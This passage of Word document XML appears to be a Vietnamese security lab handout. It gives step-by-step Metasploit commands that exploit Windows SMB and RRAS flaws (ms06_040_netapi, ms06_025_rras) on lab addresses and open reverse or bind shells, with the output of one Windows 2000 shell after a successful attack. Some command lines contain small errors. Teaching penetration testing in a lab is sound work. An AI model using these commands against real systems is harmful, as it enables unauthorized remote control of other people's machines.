        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C54EF99" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms06_040_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178B0C0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set payload windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E218C5E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812CB16" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0405FC23" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00A35EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r>
        <w:t>77</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A688FA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">set TARGET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1DCDA" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE25EC0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>session -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959D77F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:t>Microsoft Windows 2000 [Version 5.00.2195]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD04C4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C0074E">
        <w:t>C:\WINNT\system32&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169CC70C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc20808978"/>
      <w:r>
        <w:t>use windows/smb/ms06_025_rras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CC3CB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use windows/smb/ms06_025_rras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E401193" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEEEB2D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set SMBPIPE SRVSVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0EEB8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692ECB9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9053EB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F028A1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C535C30" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>use scanner/smb/pipe_auditor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05048405" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19495A7B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20F009" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A54A75" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0074E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="42" w:name="_Toc160114253"/>
      <w:bookmarkStart w:id="43" w:name="_Toc145594640"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="20264565" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00C0074E" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="7740F3D4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6F871" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05B43B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E02995" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA7ED34" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743C6F2" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> ping 192.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3410B4" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71743F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> 192.168.1.110</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>192.168.1.11</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61859131" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set TARGET 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FEBD3" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6F47D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>set LPORT 44</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE3C65" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5FD87D" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20176790" w14:textId="77777777" w:rsidR="004E7CE8" w:rsidRDefault="004E7CE8"/>
    <w:sectPr w:rsidR="004E7C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05BC2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8DAA38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16B25CF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80608B3C"/>
    <w:lvl w:ilvl="0" w:tplc="069ABEE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtHoaThi"/>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13083914">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1579437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92"/>
    <w:rsid w:val="000B5B42"/>
    <w:rsid w:val="00473C9A"/>
    <w:rsid w:val="004D5D17"/>
    <w:rsid w:val="004E7CE8"/>
    <w:rsid w:val="00596BF6"/>
    <w:rsid w:val="00902599"/>
    <w:rsid w:val="00A52212"/>
    <w:rsid w:val="00DB370B"/>
    <w:rsid w:val="00E1512B"/>
    <w:rsid w:val="00EC6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E5695"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FAFA7D19-7053-4C2F-8D57-1103C98A0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D17"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EC63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63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63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63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63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63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63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63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63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3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63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63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63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63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63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63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63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6392"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00EC63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3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6392"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:ind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63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6392"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00EC6392"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6392"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6392"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00EC63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6392"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6392"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtHoaThi">
    <w:name w:val="_txtHoaThi"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="004D5D17"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:ind w:left="284" w:hanging="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCommand">
    <w:name w:val="_txtCommand"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="004D5D17"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtNoiDung">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="004D5D17"/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtCourier">
    <w:name w:val="_txtCourier"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="004D5D17"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="FF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78171">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="122613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2640</Words>
  <Characters>15048</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>125</Lines>
  <Paragraphs>35</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>17653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Nguyen Cong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cuong Nguyen Cong</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-17T08:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-17T13:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>